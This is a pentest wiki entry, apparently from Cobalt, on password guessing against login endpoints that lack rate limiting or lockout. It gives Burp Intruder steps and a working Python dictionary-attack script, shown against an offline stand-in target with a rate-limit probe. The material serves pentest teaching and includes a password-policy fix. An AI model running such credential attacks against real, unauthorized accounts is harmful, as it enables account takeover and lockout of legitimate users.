Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V2 - Authentication

Password Cracking for Common/Weak Passwords when Password Policy is Weak

POC

  1. Confirm that the login endpoint enforces no rate limiting or account lockout (a burst of deliberately wrong passwords for one user never gets throttled), then send the login request to Burp Intruder
  2. For a known existing username, mark the password parameter as the payload position and load a common-password wordlist as the payload set
  3. Sort the Intruder results by status code or response length and check whether any weak/common password produces a different response (for example a redirect or session cookie) and authenticates as the existing user
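The three steps above as a script, added here as an example and not Cobalt's own tooling. The login target, user store and wordlist are constructed in memory so the example runs offline; against a live application the `login` callable would be replaced by one that POSTs to the real form. The only success signal used is "the response differs from the failure baseline", which is how Intruder results are read when the application does not spell out success.

```python
"""Added example (not from the Cobalt wiki): dictionary attack against a login
endpoint, preceded by the rate-limiting pre-check from step 1 of the POC."""
import hashlib
from collections import Counter


def _h(password):
    # Constructed stand-in for the application's hash; a real app uses bcrypt/argon2.
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user store: alice chose a password that appears on common lists.
USERS = {"alice": _h("Summer2023!"), "bob": _h("x7#Qv9!pLm2&zR")}

# Constructed short "common passwords" list of the kind loaded into Intruder.
COMMON_PASSWORDS = ["123456", "password", "Password1", "qwerty",
                    "Welcome1", "Summer2023!", "letmein"]


class LoginTarget:
    """Stand-in for a login endpoint. login() returns (status_code, body).
    attempts_per_user=None models the vulnerable configuration: no throttling."""

    def __init__(self, users, attempts_per_user=None):
        self.users = users
        self.limit = attempts_per_user
        self.failed = Counter()

    def login(self, username, password):
        if self.limit is not None and self.failed[username] >= self.limit:
            return 429, "Too many attempts"
        if self.users.get(username) == _h(password):
            return 302, "Location: /dashboard"
        self.failed[username] += 1
        return 200, "Invalid username or password"


def has_rate_limit(login, username, probes=20):
    """Step 1: fire wrong passwords and see whether the endpoint ever throttles."""
    for i in range(probes):
        status, _ = login(username, f"definitely-wrong-{i}")
        if status == 429:
            return True
    return False


def dictionary_attack(login, username, wordlist):
    """Steps 2-3: try each candidate and flag the first response that differs
    from the failure baseline. Returns the working password, or None."""
    baseline = login(username, "baseline-probe-not-a-real-password")
    for candidate in wordlist:
        resp = login(username, candidate)
        if resp[0] == 429:
            return None  # throttled: the precondition from step 1 no longer holds
        if resp != baseline:
            return candidate
    return None


def policy_rejects(password, common=COMMON_PASSWORDS, min_length=12):
    """The fix on the application side: reject list-of-common-passwords entries
    and short passwords at registration and password change."""
    return password in common or len(password) < min_length


if __name__ == "__main__":
    target = LoginTarget(USERS)
    if not has_rate_limit(target.login, "alice"):
        print("no rate limit; cracked:", dictionary_attack(target.login, "alice", COMMON_PASSWORDS))
```

Before running this against a real target, confirm in scope that the tested account may be locked out: a lockout that only triggers after the wordlist is half-consumed still denies service to the real user.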

Impact

High

Likelihood

Medium (if password policy is complex)